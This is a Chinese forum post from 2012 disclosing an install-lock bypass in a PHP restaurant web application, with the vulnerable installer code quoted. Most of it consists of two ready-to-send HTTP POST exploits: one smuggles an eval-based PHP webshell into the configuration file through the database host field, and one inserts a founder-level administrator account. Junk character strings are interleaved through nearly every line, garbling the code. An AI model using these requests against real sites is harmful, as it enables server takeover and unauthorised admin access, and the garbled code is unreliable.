问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
! k5 _8 E9 P7 u0 i1 @" W/ j4 A: T3 c# D9 j6 k9 K+ e8 k% m! Y: t1 s. e5 ?
<?php8 s4 H, T( [0 g0 L( r+ k' C- p! v
if(file_exists("../install.lock")). { v' p& i, g% B
{
% L; g% E# Z# S6 I. G+ E: M header("Location: ../");//没有退出 p3 k1 S& f/ Q1 `5 r
}
4 f; q. q9 n$ n- ~! ]- V R : a x0 A$ @' @# S% V
//echo 'tst';exit;
2 S; t8 P! S7 ~. P; J" xrequire_once("init.php");
; {$ M1 g+ w- H5 W( lif(empty($_REQUEST['step']) || $_REQUEST['step']==1)8 o3 C! _6 S7 ]6 x4 g+ }$ b
{% f( \- \3 C0 v2 C) ^" B; ]
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。( d' J, O1 n! |) t
1 M% S. v. X) G9 ^) c4 G1、getshell(很危险)1 Z* C1 b1 J/ D6 a. p# N
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)1 v. Q/ t9 C8 t0 p% F1 A7 Z X6 {- W
{1 h+ l2 D. G- t9 B. w: }
$smarty->assign("step",1);6 ?) Q& Z3 f# c# b
$smarty->display("index.html");2 \0 @- | O* i) l, D0 S
}elseif($_REQUEST['step']==2)8 s( \( j, s' ]. F7 N3 T$ W
{7 r: M$ k1 F6 L, i( D
$mysql_host=trim($_POST['mysql_host']);
d6 Q) F, m! r+ T# \& o $mysql_user=trim($_POST['mysql_user']);
: L' A3 Q- A) e6 P6 u" ]4 x $mysql_pwd=trim($_POST['mysql_pwd']);3 a5 v- M: p5 L. n( `6 G
$mysql_db=trim($_POST['mysql_db']);7 \* k/ G' Z' m8 k! U; H9 b: a7 F) u
$tblpre=trim($_POST['tblpre']);# c2 y1 A( x: }4 R4 d' R9 F
$domain==trim($_POST['domain']);5 V2 E# b4 i7 n! E
$str="<?php \r\n";3 [4 |; B# O$ n" S7 e
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";+ M; Y) i/ O- u1 y; W# t! p
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
( u: w8 Q' ?- f7 h9 T $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";5 U$ J L6 Z: j. h9 P- S
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";4 V9 M3 E7 \" g; M9 u/ D
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
' }7 r+ K: _8 k* {' }$ x $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";# v- J# K+ Q' v& U9 C
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
2 W0 K8 c% \7 T" Y4 n $str.='define("SKINS","default");'."\r\n";
" r4 `5 f. Q; m; a" Q$ c ?0 `' ] $str.='?>';
& N! c# q; `3 N file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
5 J& N, g! ~ U上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马" w2 Y+ \' M# d, V! U% D( \
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
4 @- [8 Z( z) x- O" hHost: 192.168.80.1299 e2 n& x! z9 y7 a
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
2 I9 D6 t! Z- G$ j2 Z8 J7 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* p) f4 F9 J7 y! K, n! A
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
3 T/ o1 ]& S- z2 ^9 c* P1 Q' v2 KAccept-Encoding: gzip, deflate" K2 H, g, e2 u6 e, S V
Referer: http://192.168.80.129/canting/install/index.php?step=1
/ q& L5 b# @$ J4 e7 oCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42( i4 L% D" i* g1 v) E
Content-Type: application/x-www-form-urlencoded
+ ~3 A; }& j' l6 R5 [: \& \Content-Length: 126- \! D5 Q5 j: ~9 V0 B- ?
3 b- O0 K- E/ [0 I- m. l: {) nmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
* B7 _$ I, o1 o3 k但是这个方法很危险,将导致网站无法运行。
; R' Y: `% Q7 Q5 x0 R( W* \0 [! P8 e& _- i+ @5 `
2、直接添加管理员
$ F* K1 ~% j4 b4 ?8 E
( I4 L0 U5 g: b7 C* I* ?# delseif($_REQUEST['step']==5)
5 ?/ W5 G4 u+ s: P9 f# K4 a. {3 e{2 `7 ]; @- ]" q; E% N9 o
if($_POST)8 M; i0 l4 X. p
{ require_once("../config/config.inc.php");
# {4 `% H) w6 k6 E+ @# l( ]2 X $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);3 k- _- b& `6 L5 I5 O0 U0 u
mysql_select_db(MYSQL_DB,$link);
' e3 E. ]; x& l6 M' g$ C mysql_query("SET NAMES ".MYSQL_CHARSET );
- t, h& Y* T! q9 u& ] mysql_query("SET sql_mode=''");
Q9 l& ^( e: o c7 R3 n: t; i
8 T3 p9 ]9 g3 E, m, p* ~6 {% g $adminname=trim($_POST['adminname']);( I0 B$ B$ ?1 e' e8 Z& ~0 i
$pwd1=trim($_POST['pwd1']);
. ?8 {9 b4 m1 k# r5 h/ D! s $pwd2=trim($_POST['pwd2']);
! D6 Y! Z. F0 d if(empty($adminname)) b. r$ I9 m, s0 ]
{) B6 m) t( j2 {& M
p7 }0 t* Y. j5 m# P. C$ t
echo "<script>alert('管理员不能为空');history.go(-1);</script>";7 Q0 J$ D- m' r2 G- ~
exit();3 F" T! k8 n' h
}
( Z# a5 s" h. \; ~9 W3 x( e if(($pwd1!=$pwd2) or empty($pwd1))( d9 C" ~, E2 j6 T2 _6 v% O. p s
{
, b8 Y1 ~& n6 P7 t8 I: [3 N echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出4 ?5 G7 v! J6 r
}
! B# Y5 R" m. I" D7 b) H2 m2 U mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
) s! L/ l, P9 }7 r }0 c1 N$ Y* B5 J6 P. s; H) u) X
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:/ U( B( u- _0 H$ T5 w
POST /canting/install/index.php?m=index&step=5 HTTP/1.13 A; T& V8 L/ L8 b6 W! g8 A
Host: 192.168.80.129
- n/ O! [8 y3 H& z: a. I7 mUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
& i/ U% [, d- b! Q. @. B) r1 u' tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8; _7 A5 d5 [% N
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.32 ^. t- K6 }- n. D. r
Accept-Encoding: gzip, deflate
7 ]: L/ ?3 |% {( tReferer: http://www.2cto.com /canting/install/index.php?step=1
' L6 d8 F/ |% W w3 u0 zCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42. I: ?! _9 M6 Z0 L1 q
Content-Type: application/x-www-form-urlencoded
! |6 \% w% k9 rContent-Length: 46& s- Y6 R' X. T* S1 l/ F
, T T( P: @: F7 W% b( `/ C9 Nadminname=qingshen&pwd1=qingshen&pwd2=qingshen8 B; Y. _( h H3 j& J& U" Y/ a$ J f
|
发表于 2012-12-4 11:13:44
收藏
支持
反对